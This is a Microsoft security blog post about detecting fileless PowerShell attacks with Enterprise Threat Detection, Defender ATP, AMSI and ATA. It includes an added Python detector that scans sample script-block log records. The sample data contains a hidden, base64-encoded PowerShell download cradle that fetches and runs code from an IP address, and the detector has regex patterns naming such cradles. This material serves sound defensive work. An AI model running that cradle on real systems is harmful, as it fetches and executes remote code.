{"id":68242,"date":"2017-05-10T09:00:36","date_gmt":"2017-05-10T16:00:36","guid":{"rendered":"http:\/\/blogs.microsoft.com\/microsoftsecure\/?p=68242"},"modified":"2023-05-15T23:11:49","modified_gmt":"2023-05-16T06:11:49","slug":"use-enterprise-threat-detection-to-find-invisible-cyberattacks","status":"publish","type":"post","link":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2017\/05\/10\/use-enterprise-threat-detection-to-find-invisible-cyberattacks\/","title":{"rendered":"Use Enterprise Threat Detection to find \u201cinvisible\u201d cyberattacks"},"content":{"rendered":"

This post is authored by Roberto Bamberger, Principal Consultant, Enterprise Cybersecurity Group.<\/em><\/p>\n

Among the many news stories about cyberattacks, several recent articles describe a class of attacks that is harder to detect because it relies on tools already present in the enterprise to accomplish its mission. SecureList calls the techniques used in these attacks \u201cinvisible\u201d and \u201cdiskless\u201d<\/a>. This post describes why such attacks are hard to detect with typical detection techniques and what you can do to protect against them.<\/p>\n

To begin, consider that many of these attacks use capabilities native to Microsoft Windows, such as PowerShell, to run their payload in memory and avoid writing files to disk, where they would be routinely scanned and could be discovered by antivirus products. That is why Microsoft has developed multiple capabilities that can detect such attacks, including:<\/p>\n

    \n
  1. Microsoft Enterprise Threat Detection<\/li>\n
  2. Windows Defender Advanced Threat Protection<\/li>\n
  3. Microsoft Advanced Threat Analytics<\/li>\n<\/ol>\n

    Here is a summary of why these can help you.<\/p>\n

    The Microsoft Enterprise Threat Detection<\/a> (ETD) service is a managed detection service that can detect invisible\/diskless attacks and provide enterprises with actionable intelligence to respond effectively to these threats. Windows 10 also includes Windows Defender Advanced Threat Protection<\/a> (Windows Defender ATP). Together with the Antimalware Scan Interface<\/a> (AMSI), which lets antimalware products inspect script content such as PowerShell at the moment it executes, even when that content never touches disk, and Microsoft Advanced Threat Analytics<\/a> (ATA), these provide user and entity behavioral analysis capabilities that can be effective in detecting such threats and their associated malicious behaviors.<\/p>\n
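    The following is an added example, not code from the original post or from any of the Microsoft products named above. It shows the kind of detection logic that becomes possible once script content is captured at execution time rather than on disk: it scans constructed records shaped like Windows PowerShell Script Block Logging events (Event ID 4104 in the Microsoft-Windows-PowerShell\/Operational log, whose ScriptBlockText field holds the script as PowerShell ran it) for the hallmarks of a diskless attack, decoding any -EncodedCommand argument so the hidden payload is scored as well. The record field names, indicator weights and alert threshold are assumptions made for this example.<\/p>\n

```python
"""Flag fileless PowerShell activity in script block log records.

Added example, not code from the original post or from Microsoft's products.
The records imitate Windows PowerShell Script Block Logging events
(Event ID 4104, Microsoft-Windows-PowerShell/Operational). The dictionary
field names, indicator weights and alert threshold are assumptions.
"""
import base64
import re

# (indicator name, weight, pattern). Weights are an arbitrary choice here.
INDICATORS = [
    ("in_memory_load", 3, re.compile(
        r"Reflection\.Assembly\]::Load|FromBase64String|MemoryStream", re.I)),
    ("download_cradle", 2, re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I)),
    ("invoke_expression", 2, re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("encoded_command", 2, re.compile(
        r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("hidden_window", 1, re.compile(
        r"-W(?:indowStyle)?\s+Hidden|-NoP(?:rofile)?\b", re.I)),
]
ALERT_THRESHOLD = 3  # assumed: one strong indicator or two weaker ones

# Captures the base64 argument of the common -EncodedCommand spellings.
ENCODED_RE = re.compile(
    r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def _encode_command(text):
    """Build an argument the way powershell.exe -EncodedCommand expects it:
    base64 over the UTF-16LE encoding of the script text."""
    return base64.b64encode(text.encode("utf-16le")).decode("ascii")


# Constructed sample records, not real telemetry.
SAMPLE_EVENTS = [
    {"event_id": 4104, "host": "WS01",
     "script": "Get-ChildItem C:\\Users"},
    {"event_id": 4104, "host": "WS02",
     "script": "powershell.exe -NoP -W Hidden -EncodedCommand " + _encode_command(
         "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s')")},
    {"event_id": 4104, "host": "WS03",
     "script": "[System.Reflection.Assembly]::Load([Convert]::FromBase64String($blob)) | Out-Null"},
    {"event_id": 4103, "host": "WS04",
     "script": "Write-Host 'hello'"},
]


def decode_encoded_commands(script):
    """Return the decoded text of every -EncodedCommand argument in script."""
    decoded = []
    for blob in ENCODED_RE.findall(script):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-16le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not a real encoded command; the raw text is still scanned
    return decoded


def analyze_script(script):
    """Return (score, sorted indicator names) for one script block, scanning
    both the raw text and any decoded -EncodedCommand payloads."""
    texts = [script] + decode_encoded_commands(script)
    hits = sorted(name for name, _, pat in INDICATORS
                  if any(pat.search(t) for t in texts))
    score = sum(w for name, w, _ in INDICATORS if name in hits)
    return score, hits


def scan_events(events, threshold=ALERT_THRESHOLD):
    """Return alerts for 4104 events whose indicator score reaches threshold."""
    alerts = []
    for ev in events:
        if ev.get("event_id") != 4104:
            continue  # only script block text events carry the executed script
        score, hits = analyze_script(ev["script"])
        if score >= threshold:
            alerts.append({"host": ev["host"], "score": score, "indicators": hits})
    return alerts


if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(alert)
```

    The decoding step matters most for the parent command line, which is where -EncodedCommand hides a download cradle from a plain string match; script block logging already records the script after PowerShell has unpacked it, which is the same property AMSI exploits by handing script content to the antimalware engine at execution time. Pattern lists like this one are easy to evade with string concatenation or other obfuscation, so treat them as a first-pass filter to be layered under the behavioral detection the post describes, not as a replacement for it.<\/p>\n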

    Enterprise Threat Detection can consume a variety of data sources:<\/p>\n